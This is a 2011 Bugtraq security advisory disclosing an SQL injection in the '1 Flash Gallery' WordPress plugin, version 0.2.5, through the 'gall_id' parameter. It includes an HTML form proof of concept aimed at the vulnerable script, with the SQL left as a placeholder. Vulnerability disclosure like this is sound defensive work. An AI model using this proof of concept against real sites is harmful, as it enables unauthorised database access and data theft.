[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201103080953.p289rDtJ092889@htbridge.ch>
Date: Tue, 8 Mar 2011 10:53:13 +0100 (CET)
From: advisory@...ridge.ch
To: bugtraq@...urityfocus.com
Subject: HTB22869: SQL Injection in 1 Flash Gallery wordpress plugin
Vulnerability ID: HTB22869
Reference: http://www.htbridge.ch/advisory/sql_injection_in_1_flash_gallery_wordpress_plugin.html
Product: 1 Flash Gallery wordpress plugin
Vendor: 1plugin.com ( http://1plugin.com/ )
Vulnerable Version: 0.2.5
Vendor Notification: 22 February 2011
Vulnerability Type: SQL Injection
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
The vulnerability exists due to failure in the "/wp-content/plugins/1-flash-gallery/massedit_album.php" script to properly sanitize user-supplied input in "gall_id" variable.
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
The following PoC is available:
<form action="http://[host]/wp-content/plugins/1-flash-gallery/massedit_album.php" method="post" name="main" >
<input type="hidden" name="album_id" value="1" />
<input type="hidden" name="images" value="1" />
<input type="hidden" name="gall_id" value="SQL_CODE_HERE" />
<input type="submit" value="submit" name="submit" />
</form>
Powered by blists - more mailing lists